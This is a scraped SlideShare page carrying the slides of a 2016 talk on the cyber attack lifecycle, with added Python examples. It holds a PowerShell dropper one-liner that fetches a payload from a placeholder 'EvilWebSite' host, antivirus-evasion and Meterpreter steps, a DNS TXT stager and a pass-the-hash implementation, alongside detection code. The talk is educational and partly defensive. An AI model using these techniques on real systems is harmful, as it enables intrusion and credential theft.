Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 

Recently uploaded (20)

Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016

Introduction
 Evolution of Cyber Crime (timeline; sophistication increases from left to right)
   1985-1995: entertainment, first worms, phone hacking
   Hacktivism, virus spread, website defacement
   Organized crime: DDoS, hacking of company systems, data leaks, industrial espionage
   2010-2016-…: cyber war, targeted attacks, state-sponsored attacks
Introduction
 Future of Cyber Crime
   Intensification of targeted cyber attacks against enterprises, with heavy impacts (financial, reputation..)
   Predominance of Advanced Persistent Threats targeting the end user
   Intensification of cyber war / cyber espionage activities between nations
   Increase of cyber crime targeting connected objects and operational technologies
     Hacking of a plane - 2015
     Hacking of a pacemaker - 2013
     Car hacking - 2015
Introduction
 Legal evolution
   General Data Protection Regulation (GDPR): adopted in April 2016, applies from 25 May 2018
   Circulars of the National Bank of Belgium: regulation for the financial sector
   Data breach notification standard: within 72 hours
   Fines in case of a data leak: up to 4% of annual worldwide turnover or 20 M€, whichever is higher
Cyber Attack Lifecycle
 1. Reconnaissance: public information, social networks, vulnerability scanning, physical observation
 2. Initial Infection: vulnerabilities, virus / malware, social engineering, physical intrusion
 3. Gain Control: control the infected system
 4. Privilege Escalation: gain elevated privileges on the infected system
 5. Lateral Movement: compromise more systems deeper in the network
 6. Persistence: maintain a persistent connection with the infected systems
 7. Malicious Activities: data exfiltration, hacking websites, money extortion..
Cyber Attack Lifecycle > Reconnaissance
 Reconnaissance is a key activity: during this phase the crucial information needed to perform the attack is obtained
 For instance, this information is used to determine the best attack vector
 Activities performed:
   Collect information concerning the target (websites, telephone numbers, generic mailboxes..) from public sources
   Collect information through direct contact such as phone calls (fake poll, job seeker..)
   Collect technical information concerning the target's information system (exposed systems, partners, data centers..)
   Collect information on the premises (garbage, WiFi scanning..)
   Actively scan the enterprise networks exposed on the Internet
Cyber Attack Lifecycle > Reconnaissance
 Commercial tool: Maltego
 Free tools (Kali Linux): recon-ng, DMitry, theHarvester
Cyber Attack Lifecycle > Reconnaissance
 WiFi reconnaissance and hacking tools from hakshop.com
Cyber Attack Lifecycle > Reconnaissance
 After the reconnaissance activities, the attacker should have enough information to determine the best attack vectors for the initial infection phase
 For instance:
   Vulnerabilities affecting systems exposed on the Internet
   Weak physical access control to the facilities
   Social engineering attack on profiles selected from, for instance, social network information
Cyber Attack Lifecycle > Initial Infection
 Initial infection aims at obtaining a first backdoor inside the target's information system
 Vectors:
   Exploiting a vulnerability affecting the victim's system(s)
   Infection through a virus / malware
   Exploiting a physical vulnerability
   Installing rogue access points or devices
Cyber Attack Lifecycle > Initial Infection
 (Diagram of the attack surface by hosting zone: Perimeter, Public Cloud, Private Cloud, Corporate Network and On Prem; each zone is shown with its applications (SaaS or corporate), servers / appliances and security technology, with the End Users at the edge)
Cyber Attack Lifecycle > Initial Infection
 LAN Turtle from Hakshop: https://youtu.be/l8YpTOv7Q2A
Cyber Attack Lifecycle > Initial Infection
 IDS/IPS bypass
   Encryption of the traffic
 Anti-virus bypass
   Use a simple PowerShell one-liner as a dropper which fetches an encrypted payload over the Internet:
     powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"
   Unknown (custom-built) malware, absent from signature databases
   Use staging to decouple the payload from the initial dropper: the payload is injected directly into memory and never touches the disk
 Firewall bypass
   Use "reverse" connections, initiated by the victim towards the C&C
   E.g. HTTPS passing through the enterprise proxy
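The download cradle above is also the pattern a defender looks for in process-creation logs (Sysmon event 1 or Windows 4688 command lines). The Python below is an added example, not part of the original deck: it normalises a command line, decodes a -EncodedCommand argument, and flags lines that combine a remote-fetch primitive with an in-memory execution primitive. The log lines are constructed for the example; EvilWebSite is the deck's own placeholder host.

```python
"""Flag PowerShell download cradles, like the dropper one-liner above, in process-creation
command lines.  Added example with constructed log lines; not code from the deck."""
import base64
import re

# A cradle needs both halves: something that fetches from the network ...
FETCH_RE = re.compile(r"\b(downloadstring|downloadfile|downloaddata|invoke-webrequest|iwr|"
                      r"net\.webclient|start-bitstransfer)\b")
# ... and something that executes the result without writing a file.
EXEC_RE = re.compile(r"\b(iex|invoke-expression|frombase64string|invoke-command)\b")
# -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or '' when the flag is absent or garbled."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def normalise(cmdline):
    """Lower-case, append any decoded -EncodedCommand script, and drop the quote and escape
    characters (", ', `, ^) that attackers sprinkle into cmdlet names to defeat naive matching."""
    text = (cmdline + " " + decode_encoded_command(cmdline)).lower()
    text = re.sub(r"[\"'`^]", "", text)
    return re.sub(r"\s+", " ", text)


def classify(cmdline):
    """Return the matched indicators for a cradle, or None.  Requiring a fetch AND an execute
    primitive keeps plain downloads (installers) and plain scripts out of the results."""
    text = normalise(cmdline)
    fetch = sorted(set(FETCH_RE.findall(text)))
    execute = sorted(set(EXEC_RE.findall(text)))
    if fetch and execute:
        return {"fetch": fetch, "exec": execute, "encoded": ENC_FLAG.search(cmdline) is not None}
    return None


def scan_log(lines):
    """Return (index, indicators) for every flagged command line."""
    hits = []
    for index, line in enumerate(lines):
        indicators = classify(line)
        if indicators:
            hits.append((index, indicators))
    return hits


# Constructed sample: one CommandLine field per event, as Sysmon event 1 / Windows 4688 would log it.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://EvilWebSite/p.txt')"
ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    # 0: the plain dropper from the slide
    "powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))\"",
    # 1: benign maintenance script that runs a local file
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # 2: the same cradle hidden behind -EncodedCommand
    "powershell.exe -nop -w hidden -enc " + ENCODED,
    # 3: backtick and quote obfuscation of the cmdlet and method names
    "powershell.exe -c \"I`EX ((New-Object Net.WebClient).'DownloadString'('http://EvilWebSite/x'))\"",
]

if __name__ == "__main__":
    for index, indicators in scan_log(SAMPLE_LOG):
        print(index, indicators)
```

The benign line is not flagged because it only executes; the encoded and obfuscated variants are flagged because the decode and quote-stripping steps run before matching. A real deployment would feed the CommandLine field of each event into scan_log and add the parent process (Office, a browser) as extra context.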
Cyber Attack Lifecycle > Initial Infection
 Free tool for malware code obfuscation: Veil-Evasion framework
   Generates obfuscated payloads using several methods
   Wraps Metasploit Meterpreter payloads
   Generates payloads from different sources: C/C++ shellcode, PowerShell shellcode, Python shellcode
Cyber Attack Lifecycle > Initial Infection
 Metasploit + Veil framework
   Create a Meterpreter backdoor obfuscated with Veil for antivirus evasion (PowerShell type)
   Embed the payload in a Word macro or a .bat file, either including the payload inline or fetching it from a web server
   Start the listener (handler) in Metasploit
   More during the demo
Cyber Attack Lifecycle > Gain Control
 Once the initial infection is done, the objective is to get control over the machine
 For this a network connection must be established between the victim and the Command & Control (C&C) server
 In general a "reverse" connection (from the victim to the C&C) is made to bypass inbound firewall protection
 Several techniques exist to bypass outbound filtering (if present)
Cyber Attack Lifecycle > Gain Control
 Standard enterprise security principles for outbound filtering:
   Default policy is to deny all outbound connections
   Allowed outbound connections must go through a proxy
   Outbound connections must conform to the expected protocol
   Outbound connections must pass other checks as well
 Examples of outbound filtering evasion techniques:
   Reverse HTTP and / or HTTPS traffic (with or without honouring the proxy settings)
   Payload staging over DNS, by placing the payload in the TXT records of a domain the attacker controls
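The DNS TXT staging listed above, as an added example that is not part of the original deck: a Python simulation of both sides plus the check a defender can run over resolver logs. The attacker publishes the payload as numbered TXT records, the stager reassembles and verifies them, and the defender's check flags a domain that answers many distinct TXT lookups with long records. The zone dictionary stands in for the attacker's authoritative DNS server, stager.example is a hypothetical domain, the thresholds are assumptions, and all traffic is constructed in memory so nothing touches the network.

```python
"""Payload staging over DNS TXT records, and the query-log check against it.
Added example with a simulated zone and resolver log; not code from the deck."""
import base64
import hashlib
from collections import defaultdict

CHUNK = 180                 # raw bytes per record: base64 of 180 bytes is 240 chars, under the 255-byte TXT string limit
DOMAIN = "stager.example"   # hypothetical attacker domain (.example is reserved for documentation)


def publish(payload, domain, zone):
    """Attacker side: split the payload into numbered TXT records under <domain>.
    Record 0 is a header 'count:sha256' so the stager can verify the reassembled bytes."""
    chunks = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)]
    zone[f"0.{domain}"] = f"{len(chunks)}:{hashlib.sha256(payload).hexdigest()}"
    for n, chunk in enumerate(chunks, 1):
        zone[f"{n}.{domain}"] = base64.b64encode(chunk).decode("ascii")
    return len(chunks)


def stage(domain, resolve_txt):
    """Stager side: fetch the header, then each numbered record, and verify the digest.
    A missing or altered record raises instead of executing a corrupted payload."""
    count, digest = resolve_txt(f"0.{domain}").split(":")
    data = b"".join(base64.b64decode(resolve_txt(f"{n}.{domain}")) for n in range(1, int(count) + 1))
    if hashlib.sha256(data).hexdigest() != digest:
        raise ValueError("payload digest mismatch")
    return data


def suspicious_txt_domains(query_log, min_queries=4, min_avg_len=120):
    """Defender side: group TXT queries by parent domain and flag domains that answer many
    distinct TXT lookups with long records, the shape a staged payload leaves behind.
    query_log rows are (client, qtype, qname, answer_length)."""
    per_domain = defaultdict(list)
    for _client, qtype, qname, answer_len in query_log:
        if qtype != "TXT":
            continue
        parent = ".".join(qname.split(".")[-2:])
        per_domain[parent].append((qname, answer_len))
    flagged = []
    for parent, rows in per_domain.items():
        distinct = {qname for qname, _ in rows}
        avg_len = sum(length for _, length in rows) / len(rows)
        if len(distinct) >= min_queries and avg_len >= min_avg_len:
            flagged.append(parent)
    return sorted(flagged)


def run_simulation():
    """Publish a constructed payload, stage it through a logging resolver, and run the check
    over that log merged with constructed benign traffic (SPF and DKIM lookups)."""
    payload = bytes(range(256)) * 3          # 768 bytes of constructed 'shellcode'
    zone = {}
    publish(payload, DOMAIN, zone)
    query_log = [("10.0.0.5", "A", "www.example.com", 4),
                 ("10.0.0.5", "TXT", "example.com", 60),                         # SPF record
                 ("10.0.0.6", "TXT", "selector1._domainkey.example.com", 220),   # DKIM key
                 ("10.0.0.6", "TXT", "example.com", 60)]

    def resolve_txt(name):
        answer = zone[name]
        query_log.append(("10.0.0.7", "TXT", name, len(answer)))
        return answer

    staged = stage(DOMAIN, resolve_txt)
    return staged == payload, suspicious_txt_domains(query_log)


if __name__ == "__main__":
    print(run_simulation())
```

The payload comes back intact and the stager domain is the only one flagged: the DKIM lookup is long but a single name, and SPF is short. Tuning is the hard part in practice, since mail security products also issue many TXT queries; the numeric-label pattern and the client making all the queries are the next fields to pivot on.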
Cyber Attack Lifecycle > Gain Control
 Metasploit / Meterpreter
   Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Cyber Attack Lifecycle > Privilege Escalation
 Escalate privileges on the infected machine in order to gain elevated access; the typical goal is Administrator or SYSTEM privileges
 Several techniques:
   "Local exploits" against applications installed on the infected machine
   Manual search for credentials in scripts
   Password hash dump (e.g. the SAM on Windows, /etc/shadow on Linux) and offline cracking
   Grabbing authenticated sessions (e.g. VPN sessions)
   SSH keys
   World-writable files
   Reading command history files
   Altering batches / jobs
   Process injection: inject malicious code into processes running under a privileged user such as a "Domain Admin"
Cyber Attack Lifecycle > Privilege Escalation
 Metasploit: "Incognito" module
   Allows impersonating authentication tokens on compromised Windows hosts
   The backdoor must already run with "SYSTEM" or "Administrator" privileges in order to see interesting authentication tokens
   TIP: file servers are virtual treasure troves of tokens, since most file servers are mapped as network drives via domain logon scripts and therefore hold sessions from many users
Cyber Attack Lifecycle > Lateral Movement
 From the infected systems, try to infect more systems deeper in the network
 Basically repeat the Cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)
 Aim for high-value systems: Windows domain controllers, file servers..
 Techniques:
   Credential re-use / pass-the-hash / SSH key re-use
   Vulnerabilities in internal applications (less often patched)
   Network segmentation issues between environments (e.g. port 445 reachable): PsExec with pass-the-hash
Cyber Attack Lifecycle > Lateral Movement
 Metasploit: pivoting technique
   Use the first compromise to reach, and then compromise, systems that are otherwise inaccessible from the attacker's host
   Use autoroute to make the compromised host a pivot into the networks it can reach
   Scan the network through the route created, on ports 139 & 445
   Start a new session on a new host using PsExec and the "pass-the-hash" technique, re-using the local Administrator password hash
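Why the last step works with nothing but the local Administrator hash, shown as an added example (not the deck's code and not Metasploit's psexec module): NTLM authentication proves knowledge of the NT hash, never of the password, so a dumped hash is a password equivalent. The Python below implements MD4 (OpenSSL 3 builds of hashlib no longer ship it), derives the NT hash, and runs the NTLMv2 challenge/response with the server verifying against the hash it stores. The account name, domain, challenge and the simplified blob are constructed, and the scenario assumes both hosts share the same local Administrator password, which is exactly what the slide's technique relies on.

```python
"""Why pass-the-hash works: NTLM never proves the password, only the NT hash.  Added example
with a constructed challenge/response exchange; not the deck's code, not Metasploit's module."""
import hashlib
import hmac
import struct


def md4(data):
    """MD4 per RFC 1320, in pure Python because OpenSSL 3 builds of hashlib no longer ship it."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, order of X[k], shift amounts)
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for offset in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[offset:offset + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash: MD4 of the UTF-16LE password.  This is what a SAM dump yields."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt, user, domain):
    """NTLMv2 key: HMAC-MD5 over the upper-cased user name and the domain, keyed by the NT hash."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, blob):
    """Client side: NTProofStr || blob.  Only the NT hash enters the computation."""
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_accepts(stored_nt, user, domain, server_challenge, response):
    """Server side: recompute NTProofStr from the stored hash and compare in constant time."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def pass_the_hash_demo():
    """Constructed scenario from the slide: the local Administrator hash dumped on host 1 is
    replayed against host 2, which uses the same local Administrator password.  Returns
    (accepted with the dumped hash, accepted with a wrong hash)."""
    dumped = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # NT hash of 'password'
    user, domain = "Administrator", "WS02"                      # hypothetical target account
    server_challenge = bytes.fromhex("0123456789abcdef")         # constructed 8-byte challenge
    # Simplified NTLMv2 blob: header, reserved, timestamp, client nonce; target info omitted.
    blob = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("deadbeefcafebabe") + bytes(4)
    response = ntlmv2_response(dumped, user, domain, server_challenge, blob)
    accepted = server_accepts(dumped, user, domain, server_challenge, response)
    wrong = ntlmv2_response(nt_hash("notthepassword"), user, domain, server_challenge, blob)
    rejected = server_accepts(dumped, user, domain, server_challenge, wrong)
    return accepted, rejected


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("dumped hash accepted / wrong hash accepted:", pass_the_hash_demo())
```

Nothing in the exchange needs the clear-text password, which is why unique local Administrator passwords (LAPS), blocking port 445 between workstations, and Protected Users / Credential Guard are the controls that actually stop this step; cracking resistance of the password is irrelevant.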
Cyber Attack Lifecycle > Maintain Persistence
 Prevent loss of connection between the infected machines and the C&C
 Techniques:
   Create jobs / scheduled tasks
   Create a service running at startup
   Use AppInit DLLs (disabled in Windows 8 and later when Secure Boot is enabled)
   Bootkit / rootkit
   Default file association hijacking
   Logon scripts
   Modification of applications / services
   Registry Run keys
Cyber Attack Lifecycle > Maintain Persistence
 Metasploit persistence module
   Creates a Meterpreter service which starts when the compromised host boots and calls back to the C&C
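A triage check for the registry-based techniques above (Run keys and AppInit_DLLs), added here as a Python example rather than anything from the deck. It parses the text produced by reg export and flags entries that run from user-writable directories, impersonate a system binary outside System32, launch a script host with hidden or encoded arguments, or enable AppInit DLL injection. The export below is constructed; the alice account, the Updater value and hook.dll are hypothetical, and the directory and name lists are starting points, not a complete catalogue.

```python
"""Triage of registry persistence entries (Run/RunOnce keys, AppInit_DLLs) from 'reg export'
text.  Added example on a constructed export; not code from the deck."""
import re

RUN_KEYS = (
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runonce",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\runonce",
)
APPINIT_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\windows"
# Locations an unprivileged user can write to; legitimate autostarts rarely live there.
WRITABLE_DIRS = ("\\users\\public\\", "\\temp\\", "\\programdata\\", "\\downloads\\", "\\appdata\\roaming\\")
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32", "certutil")
SYSTEM_NAMES = ("svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe")
SUSPICIOUS_ARGS = re.compile(r"-e(nc|ncodedcommand)?\b|-w hidden|https?:|iex\b|invoke-expression|frombase64string")


def parse_reg_export(text):
    """Parse .reg text into {key path (lower-case): {value name: value}}.
    REG_SZ strings are unescaped (doubled backslashes, escaped quotes); dword values become ints;
    other value types are skipped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            name, _, value = line[1:].partition('"=')
            if value.startswith("dword:"):
                keys[current][name] = int(value[6:], 16)
            elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
                keys[current][name] = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return keys


def executable(cmd):
    """First token of a command line: the quoted path if quoted, else up to the first space."""
    cmd = cmd.strip()
    if cmd.startswith('"') and cmd.find('"', 1) > 0:
        return cmd[1:cmd.find('"', 1)]
    return cmd.split(" ", 1)[0]


def triage(keys):
    """Return (key, value name, value, reasons) for every persistence entry worth a look."""
    findings = []
    for key in RUN_KEYS:
        for name, cmd in keys.get(key, {}).items():
            if not isinstance(cmd, str):
                continue
            low = cmd.lower()
            exe = executable(low)
            base = exe.rsplit("\\", 1)[-1]
            reasons = []
            if any(d in exe for d in WRITABLE_DIRS):
                reasons.append("runs from a user-writable directory")
            if base in SYSTEM_NAMES and "\\system32\\" not in exe and "\\syswow64\\" not in exe:
                reasons.append("system binary name outside System32")
            if any(h in base for h in SCRIPT_HOSTS) and SUSPICIOUS_ARGS.search(low):
                reasons.append("script host with hidden/encoded/download arguments")
            if reasons:
                findings.append((key, name, cmd, reasons))
    windows = keys.get(APPINIT_KEY, {})
    dlls = windows.get("AppInit_DLLs", "")
    if dlls and windows.get("LoadAppInit_DLLs", 0) == 1:
        findings.append((APPINIT_KEY, "AppInit_DLLs", dlls,
                         ["AppInit DLL injection enabled (ignored on Windows 8+ with Secure Boot)"]))
    return findings


# Constructed export: two legitimate autostarts, two planted ones, and an AppInit DLL.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\Users\\Public\\svchost.exe -h"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"dl"="powershell.exe -nop -w hidden -enc SQBFAFgA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\ProgramData\\hook.dll"
"LoadAppInit_DLLs"=dword:00000001
"""

if __name__ == "__main__":
    for key, name, value, reasons in triage(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{key}\\{name} = {value}\n    {'; '.join(reasons)}")
```

The two Microsoft entries pass while the planted svchost.exe in Users\Public, the hidden encoded PowerShell and the AppInit DLL are reported. The same parser can be pointed at an export of the Services key or the scheduled-task XML folder to cover the other techniques in the list.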
Cyber Attack Lifecycle > Demo
 Social engineering scenario
   Send a "virus" to the victim which consists of a Metasploit Meterpreter instance, undetected by an up-to-date commercial antivirus
 Steps:
   1. Prepare the malware & environment
   2. Send the malware
   3. Execute the malware
   4. The victim gets infected & contacts the C&C
   5. Interact
Vulnerabilities and Exploitation
 A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
   Simple: default password. Complex: buffer overflow in an application
 Dozens of new vulnerabilities are officially classified every day (http://www.cvedetails.com)
 Dozens of others are not disclosed!
   0-day: a vulnerability not yet discovered by the vendor, or discovered but not disclosed
 Vulnerabilities are discovered by:
   Researchers, students (ethical hackers)
   Professional researchers / vulnerability brokers (http://www.zerodayinitiative.com/)
   France: Vupen Security, sells vulnerabilities to the NSA
   Cyber criminals (0-days)
Vulnerabilities and Exploitation
 Full disclosure principle: vulnerabilities are reported and published publicly as soon as they are discovered, without waiting for a patch to be available
 Responsible disclosure principle: vendors are notified first; the vulnerability is publicly disclosed after a grace period, e.g. 45 days
 Websites listing vulnerabilities and associated exploits:
   www.securityfocus.com
   www.1337day.com (not free)
   http://www.cvedetails.com/
   http://www.exploit-db.com/
   Underground websites on the TOR network
 Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)
Vulnerabilities and Exploitation
 Root causes:
